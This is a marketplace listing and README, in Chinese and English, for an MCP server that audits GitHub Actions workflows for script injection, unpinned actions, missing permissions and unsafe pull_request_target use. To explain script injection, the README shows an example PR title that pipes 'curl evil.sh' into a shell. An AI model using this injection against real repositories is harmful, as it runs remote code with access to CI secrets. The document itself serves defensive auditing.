
GitHub Actions Security Audit
io.github.tylerscomic-labv1.0.0更新于 Oct 2, 2026
Audit GitHub Actions workflows for script injection, unpinned actions and missing permissions.
概览
审计 GitHub Actions 工作流 YAML,检查脚本注入、未固定版本的操作、缺失权限以及不安全的 pull_request_target 用法。
- 功能
- 该服务器扫描 GitHub Actions 工作流 YAML 中的安全问题,而非代码风格问题。它会解析 YAML 结构,报告 run 步骤中来自攻击者可控表达式的脚本注入、仅固定到标签或分支的第三方操作、缺失的 permissions 块,以及 pull_request_target 与检出 PR 头提交组合使用的情况。audit_workflow 工具返回风险等级以及每个发现的位置、原因和具体修复建议;check_expression_injection 用于检查单个 shell 命令字符串。
- 适用场景
- 适用于审查或加固 CI/CD 工作流,尤其是在合并工作流文件变更之前,或审计会运行不受信任拉取请求的仓库时。适合希望进行针对性安全检查而非通用 YAML 检查的维护者。
- 运行要求
- 托管选项是远程 streamable HTTP 端点,无需本地运行时。自托管需要 Node.js,安装依赖后在本地运行服务器。托管方案描述为免费层加付费 Pro 选项。
安装
在 SourceWeft 中
- 打开 控制台中的 GitHub Actions Security Audit,将其添加到工作区。
- 为需要使用其工具的对话启用该服务。
Web executable,通过 Streamable HTTP。 远程服务在工作区中配置后即可从网页运行时运行。
其他 MCP 客户端
把它添加到你客户端的 mcpServers 配置中。
{
"mcpServers": {
"github-actions-audit-mcp": {
"type": "http",
"url": "https://github-actions-audit-mcp.mcpize.run/mcp"
}
}
}README
github-actions-audit-mcp
[License: MIT] [Live on MCPize]
An MCP server that audits GitHub Actions workflow YAML for the real vulnerability classes that have caused actual incidents — not a linter, a security scanner. Parses genuine YAML structure (a hand-written block parser scoped to what workflow files actually use), not string/regex matching against the raw file.
What it catches
Script injection. Any ${{ github.event.issue.title }}-style expression that carries attacker-controlled text
(issue/PR titles, comments, review bodies, branch names) interpolated directly into a run: shell step. The
expression is substituted into the generated shell script before the shell runs it — a PR titled "; curl evil.sh | sh # becomes literal shell syntax, not a string. This is the single most common real-world GitHub Actions
vulnerability. Flags the exact expression and shows the env-variable fix that actually neutralizes it.
Unpinned third-party actions. uses: some-action@v4 or @main can be repointed by whoever controls that
tag/branch, without you changing a single character in your workflow file — this is exactly what happened in the
tj-actions/changed-files compromise (March 2025), where a maintainer's
PAT was used to retag v35–v46 to point at a credential-harvesting commit. Only a full 40-character commit SHA is
immutable.
Missing permissions: blocks. No explicit permissions: means the GITHUB_TOKEN defaults to whatever your
repo/org settings allow — often read-write. If any step is ever compromised, it inherits that full scope.
pull_request_target + head checkout. This trigger runs with the base repo's secrets and a write-scoped token
(unlike plain pull_request), and if the workflow also checks out the PR's own head commit, a fork's PR can run
arbitrary code with your secrets. Real supply-chain incidents follow this exact pattern.
Tools
audit_workflow
Full audit of a workflow YAML file. Returns a risk level and every finding with its exact location, why it's dangerous, and a concrete fix.
check_expression_injection
Focused check on a single shell command string, for when you just want to sanity-check one run: step without a
full workflow file.
Use it
Hosted (recommended): MCPize — free tier, $7/mo Pro.
Self-host:
Part of a small suite
regex-safety-audit-mcp, mcp-trust-audit-mcp, secrets-leak-audit-mcp, dockerfile-audit-mcp.
License
MIT
来源:README.md,提交 9c5baae
工具
0版本历史
1- v1.0.0最新Oct 2, 2026

